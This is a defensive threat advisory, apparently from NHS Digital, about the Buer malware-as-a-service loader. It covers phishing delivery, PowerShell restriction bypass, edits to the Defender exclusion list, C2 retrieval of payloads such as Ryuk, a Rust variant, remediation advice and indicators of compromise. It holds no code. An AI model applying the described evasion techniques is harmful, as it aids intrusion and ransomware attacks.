Buer Dropper

Buer is a modular MaaS downloader trojan sold on hacking forums. Advertised by its creators as a cheaper alternative to more established loaders such as Emotet, it has seen a massive increase in usage in the wake of Trickbot's takedown.

Threat ID:: CC-3656
Category:: Loader, Trojan
Threat Severity:: Medium
Threat Vector:: Spear phishing, Email spam
Published:: 4 November 2020 12:00 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

Affected platforms

The following platforms are known to be affected:

Versions: all supported

Microsoft Windows

Threat details

Introduction

First observed in August 2019, Buer (AKA BuerLoader) is a modular malware-as-a-service (MaaS) dropper that competes with other downloader trojans such as Emotet and Bazar.

Written in C and ASP.NET Core MVC, it is sold through several dark web forums for less than £300

Delivery

As with most MaaS offerings, affiliate users are responsible for delivering Buer. However, at the time of publication, only one distribution chain has been observed. This chain bears many similarities to that used by Bazar, with a preliminary loader delivered via Google Docs links within highly tailored spear-phishing emails sent by a legitimate commercial email service. When a user interacts with these links, the loader calls out to a delivery URL to download an EXE file disguised as a Microsoft Office doc. it will then perform several checks to determine the affected system's location, terminating itself if it detects a match for CIS countries, before unpacking the EXE containing Buer. This is then loaded directly into the affected system's memory.

Activities

Once installed, Buer will execute two separate sets of PowerShell commands; one set to bypass command execution restrictions, and another to edit the Windows Defender file exclusion list. If successful, it then connects to a command and control sever, via HTTPS POST and GET messages, to retrieve any payloads which are then dropped with dynamically generated names in C:\ProgramData. Payloads dropped by Buer include the Cobalt Strike and Empire post-exploitation toolsets, and Ryuk ransomware.

Threat updates

Date	Update
6 May 2021	New variant written in Rust A new variant of the Buer malware is now being distributed written in the coding language of Rust. The new variant, known as RustyBuer, is being delivered via phishing in the guise of a DHL support email. The reason the new variant is being written in Rust could be to help avoid detection.

Remediation advice

To prevent and detect an infection, NHS Digital advises that:

Secure configurations are applied to all devices.
Security updates are applied at the earliest opportunity.
Tamper protection settings in security products are enabled where available.
Obsolete platforms are segregated from the rest of the network.
IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
Administrative accounts are only used for necessary purposes.
Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.

Indicators of compromise

Network indicators

IP addresses

04.248.83[.]13

Host indicators

SHA256 hashes

10943b90969722bf359e4b039d2953e02072e03e0a7f1bdb1dea09d9197288b1
32616f41a71fc7a4286736a6fc77da2a555dbc8301a8bd5fbdbab231955a42c5
5b607f001ba62e042344d30b65cad2774df2deb50e0b92c33da85e9338c123c4
6c7f43434e5db8703c0a47dedeeab976159d8704bfbe2e4ff65405f38d508e9d

Last edited: 6 May 2021 12:17 pm